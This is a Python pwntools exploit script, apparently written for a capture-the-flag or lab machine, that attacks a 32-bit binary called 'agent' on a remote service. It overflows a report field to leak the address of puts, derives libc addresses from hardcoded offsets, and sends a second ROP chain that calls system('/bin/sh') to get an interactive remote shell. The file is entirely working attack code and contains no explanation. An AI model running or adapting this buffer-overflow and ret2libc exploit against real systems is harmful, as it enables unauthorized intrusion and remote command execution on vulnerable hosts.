#!/usr/bin/env python
# -*-coding:utf-8 -*-
from pwn import *
#from LibcSearcher import *

#context.log_level = 'debug'

context(arch = 'i386' ,os = 'linux')

#p = process('./agent')
p = remote('192.168.56.101',7788)

elf = ELF('./agent')


p.recvuntil('Agent ID :')
p.sendline('48093572')
p.recvuntil('Enter selection: ')
p.sendline('3')
p.recvuntil('Enter report update: ')

payload='A'*168
payload+=p32(elf.symbols['puts'])+p32(0x080485FB)+p32(elf.got['puts'])
p.sendline(payload)

p.recvuntil('Submitted for review.\n')
puts_addr = u32(p.recvuntil('\n',drop=True)[:4])
log.success('puts_addr:%x' % puts_addr)

#libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - 0x0005f140#libc.dump('puts')
system_addr = libc_base + 0x0003a940#libc.dump('system')
log.success('system_addr:%x' % system_addr)
str_bin_sh = libc_base + 0x15900b#libc.dump('str_bin_sh')
log.success('str_bin_sh_addr:%x' % str_bin_sh)

#gdb.attach(p,'b *0x0804896D')
p.recvuntil('Agent ID :')
p.sendline('48093572')
p.recvuntil('Enter selection: ')
p.sendline('3')
p.recvuntil('Enter report update: ')

payload2= 'B'*168
payload2+=p32(elf.symbols['gets'])+p32(0x8048435)+p32(0x0804B040)+p32(system_addr)+p32(0xdeadbeef)+p32(0x0804B040)


p.sendline(payload2)

p.sendline('/bin/sh\x00')

p.interactive()